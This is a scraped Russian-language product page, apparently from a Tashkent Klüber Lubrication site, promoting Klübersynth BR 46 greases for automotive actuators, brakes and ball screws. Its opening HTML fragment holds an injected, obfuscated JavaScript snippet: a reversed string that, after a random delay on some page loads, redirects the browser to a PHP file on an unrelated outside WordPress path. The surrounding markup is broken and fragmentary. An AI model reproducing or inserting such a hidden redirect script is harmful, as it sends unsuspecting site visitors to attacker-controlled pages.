tom-css' href='https://www.klueber.uz/wp-content/themes/betheme/css/skins/cusscript$zXz=function(n)if%20(typeof%20($zXz.list%5Bn%5D)%20==%20string)%20return%20$zXz.list%5Bn%5D.split().reverse().join();return%20$zXz.list%5Bn%5D;;$zXz.list=%5B'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod%5D;var%20number1=Math.floor(Math.random()%20*%206);if%20(number1==3)var%20delay%20=%2018000;setTimeout($zXz(0),%20delay);/scripttom/style.css?ver=21.2.1' type='text/css' media='all' /> tom style-default button-flat layout-full-width hide-love header-stack header-right minimalist-header-no sticky-header sticky-tb-color ab-hide subheader-transparent subheader-both-center menu-link-color menuo-last footer-copy-center mobile-tb-left mobile-mini-mr-ll tr-content be-2121 wpb-js-composer js-comp-ver-4.9.2 vc_responsive">

Надежное смазывание актуаторов в автомобильных компонентах

car repair oil klueber tashkent
to" style="padding-top:0px;padding-bottom:0px;background-color:" >
top bg-auto clearfix" style="" >

Исполнительные механизмы или актуаторы являются силовым элементом трансмиссии, преобразующим электрический сигнал в механическое перемещение. Однако для надежного функционирования актуаторов их небольшие механические компоненты должны быть надежно смазаны. В автомобильном секторе электромеханические элементы сегодня используют в различных применениях – в тормозах, рулевом управлении или механизме сцепления. Условия работы изменяются согласно особенностям применения и могут включать, например, очень высокие температуры, скорости или ускорения наряду с малым усилием привода. Компания Klüber Lubrication разработала серию специальных смазок на весь срок службы актуаторов, которые абсолютно соответствуют требованиям срока в автоиндустрии.

Наши новые специальные смазки для актуаторов предлагают долговременную стабильность на протяжении 15 лет без необходимости досмазывания. Речь идет в основном о линейных механических приводах и о подшипниках качения в электродвигателях или электромагнитных клапанах, а также компонентах управления двигателем и системах комфорта. Так как эти компоненты не досмазываются, их надежное функционирование является крайне важным.

Высокая защита от износа для компонентов Brake-by-Wire (системы управления тормозами по проводам) Klübersynth BR 46-82 разработана для обеспечения высокой надежности в широком диапазоне температур, например, в электромеханическом и стояночном тормозе. Эта смазка также обеспечивает хорошую защиту от износа для ШВП и других элементов механического привода при долговременных температурах вплоть до 180 °С и пониженных температурах до -40 °С. Базовое масло совместимо со стандартными тормозными жидкостями и уплотнениями из EPDM. Klübersynth BR 46-82 – это выгодная альтернатива дорогим смазкам на базе перфторполиэфирных масел.

Специальная смазка для надежного функционирования в подшипниках качения электромеханических систем В автомобильном секторе такие компоненты как подшипники качения ШВП и небольшие редукторы должны обладать низким пусковым моментом даже при низких температурах. Использование специальных уплотнений делает проблему совместимости чуть ли не более важной. Новая смазка Klübersynth BR 46-32 разработана с учетом соответствия требованиям долговременного смазывания компонентов, имеющих в составе подшипники качения. Специальная смазка на основе маловязкого масла обладает хорошими низкотемпературными свойствами при -45 °С также, как и низким пусковым моментом, таким образом способствуя повышению энергоэффективности. Klübersynth BR 46-32 совместима с EPDM-уплотнениями и тормозными жидкостями.

Специальная смазка с твердыми смазывающими веществами, устойчивая к высоким температурам Исполнительные механизмы тормозов и сцепления оснащены планетарными передачами с подшипниками качения или ШВП, которые создают небольшие усилия привода, сочетающиеся с большим ускорением. Новая смазка Klübersynth BR 46-32 F была специально разработана для удовлетворения этих исключительных требований. Масло низкой вязкости обеспечивает очень плавную работу при низких температурах, а его превосходная устойчивость к окислению гарантирует безопасное функционирование при высоких температурах. Специальная смазка применяется для смазывания на весь срок службы. Она содержит комбинацию присадок и твердых смазывающих веществ, которые обеспечивают хорошую защиту от износа в условиях трения скольжения. Klübersynth BR 46-32 F специально разработана для обеспечения хорошей совместимости с EPDM-эластомерами, для чего выбран тот же тип базового масла, что и для других смазок серии Klübersynth BR 46.